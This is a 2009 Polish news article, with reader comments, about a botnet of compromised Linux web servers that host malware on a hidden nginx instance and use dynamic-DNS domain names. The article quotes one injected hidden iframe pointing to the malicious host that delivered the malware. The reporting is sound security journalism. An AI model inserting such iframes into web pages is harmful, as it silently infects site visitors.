Ładowanie Ładowanie
Webhosting.pl WindowsHosting.pl Forum E-Wydania Kontakt RSS
Zaloguj się Zarejestruj się Po co mi konto?   Szybkie logowanie

News: > Botnet serwerów WWW: bo Linux też jest podatny na zombifikację

strony: 1 | 2 następna »
wydrukuj: print publikuj: wykop dodaj do flakera Dodaj jako nius na OSnews.pl! delicious

Botnet serwerów WWW: bo Linux też jest podatny na zombifikację

TAGI: botnet , linux , serwer www , apache , nginx
2009-09-14 08:54:00 | Adam Golański
Botnet serwerów WWW: bo Linux też jest podatny na zombifikację

Denis Sinegubko, mieszkający na południu Rosji niezależny specjalista z dziedziny bezpieczeństwa IT, odkrył w Sieci coś niezwykłego, co raczej nie ucieszy miłośników Linuksa i rozmaitych, związanych z tych systemem mitów. Przemienione w zombie linuksowe serwery funkcjonują jak klasyczny botnet do zadań specjalnych, rozprowadzając w Sieci szkodliwe oprogramowanie.

„To co tu widzimy, to długo wyczekiwany botnet poddanych zombifikacji serwerów WWW! Grupa połączonych ze sobą serwerów ze wspólnym ośrodkiem sterującym, która służy rozprowadzaniu szkodników (…) a cały botnet jest połączony z botnetem działającym na normalnych, domowych komputerach PC” – z entuzjazmem rozpoczął swoją relację Sinegubko.

Każda z zarażonych maszyn odkrytych przez rosyjskiego badacza, to serwer wirtualny lub dedykowany, na którym hostowana jest całkiem legalna witryna, serwowana przez Apache'a na porcie 80. Jednak po cichu maszyny te uruchamiają serwer nginx na porcie 8080, wysyłając za jego pomocą szkodliwy kod. Jest to możliwe dzięki dostawcom dynamicznego DNS – DynDNS.com i No-IP.com – zapewniającym darmowe domeny, podłączane pod IP poddanych zombifikacji serwerów.

Usługi te dostarczają wielu (łącznie ponad stu) domen drugiego poziomu, które mogą być wykorzystane do konstruowania licznych i wiarygodnie wyglądających domen trzeciego poziomu. Dzięki temu atakujący mogą stosować nazwy takie jak np. server.homelinux.org – które zupełnie nie wyglądają jak typowe źródło malware'u.

Kolejnym krokiem jest wykorzystanie pływających ramek iframe, za pomocą których szkodliwy kod wstrzykiwany jest do normalnych stron internetowych. Wygląda to np. tak:

<iframe src="http ://a86x . homeunix . org:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>

Najnowsze wiadomości
1 | 2 następna »

reklama

strony: 1 | 2 następna »
wydrukuj: print publikuj: wykop dodaj do flakera Dodaj jako nius na OSnews.pl! delicious

Czytaj webhosting.pl:

Czytaj Dalej

Panda Security pomaga ująć autora botnetu "Butterfly" Facebook zawojował świat dzięki Open Source? (2) Microsoft uwalnia swoje języki dynamiczne dla .NET-u na licencji Apache (1) Rok 2015 będzie rokiem Linuksa – na tabletach (9)

Dyskusja

dodaj komentarz
0 + -
comnt #01 k6t 2009-09-14 09:52:08
k6t "pozwolili na to, by ktoś wykradł ich hasła roota za pomocą snifferów."

Przy takim zalozeniu wszystko jest zombifikowalne. Nie oznacza to bynajmniej ze linux jest jakos specjalnie podatny na zzombifikowanie.
------------------
Browser: Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.13) Gecko/2009082121 Iceweasel/3.0.12 (Debian-3.0.12-1)
0 + -
comnt #02 zombie 2009-09-14 16:21:32
zombie Zombifikacja? To chyba słowo z żargonu fanów różnego rodzaju haju ;] (via google)
------------------
Browser: Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
0 + -
comnt #03 Sławek 2009-09-14 19:54:35
Sławek Nie przyłożyliście. W sieci nie ma informacji, że wszystkie maszyny należały do jednego klastra. Wynika, że ktoś miał fizyczny dostęp do maszyny lub wykradł hasła(o czym już napomknęliście).
------------------
Browser: Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.1.0) Gecko/20090623 SUSE/3.5.0-7.1 Firefox/3.5
0 + -
comnt #04 dom 2009-09-14 22:10:18
dom Jest rzeczą absolutnie niesamowitą, że prawie zawsze do artykułów stawiających w niezbyt dobrym świetle linuksa, pojawiają się komentarze deprecjonujące ów artykuł, napisane przez zaciekłych "fan-boy'ów". Nie, linux nie jest superbezpieczny, o czym po raz kolejny się dowiadujemy.

Ciekawy jest fakt, że atak jest na sporą skalę - sam odkryłem co najmniej kilka domen, gdzie wszystkie pliki index.* mają iframe'a załączającego złośliwy kod z powyższych serwerów.
------------------
Browser: IBrowse/2.4 (AmigaOS 3.9; 68K)
0 + -
comnt #05 The Bit 2009-10-15 12:03:58
The Bit Problm, polega na, iż nie jestem przekonany co do tego sniffera, raczej to modyfikacja nginx, dlaczego? otóż zanim ogłoszono to tak

wszem i wobec, polak informował o dziwny zdażeniu, ktoś jak

gdyby pominoł etap logowania a co za ty idzie, podawania

hasła i odrazu przystąpił do transkacji download upload, co

jest jeszce dziwniejsze, to to że prawdopodobnie nie miał uprawnień root-a, a dziłania dotyczyły strefy "zdemilitaryzowanej" na wymienione szczegóły, byc może troche na wyrost przezemnie, składają sie logi, więcej o tym

fakcie można przeczytać na stronie uwlinux.
------------------
Browser: Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
0 + -
comnt #06 ffatman 2009-11-08 14:14:25
ffatman Jest rzeczą absolutnie niesamowitą, że prawie zawsze do artykułów stawiających w niezbyt dobrym świetle administratorów ustawiających user:1234 pass:9876 winboye dorabiają komenty o złym Linuksie.
------------------
Browser: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.6pre) Gecko/20091106 Ubuntu/9.04 (jaunty) Shiretoko/3.5.6pre

Komentarze
  • Aby dodać komentarz, musisz podać swój nick, treść komentarza oraz poprawnie przepisać oba słowa z obrazka (słowa muszą być rozdzielone spacją).
  • Jeśli masz problemy z odczytaniem słów, zmień zdjęcie.
  • Używamy tego zabezpieczenia, ponieważ dzięki niemu rozwija się projekt reCAPTCHA. Sugerujemy jednak, by zarejestrować się w serwisie i w ten sposób ominąć konieczność ciągłego odczytywania wyrazów.
  • W treści komentarza można używać języka formatowania BBcode.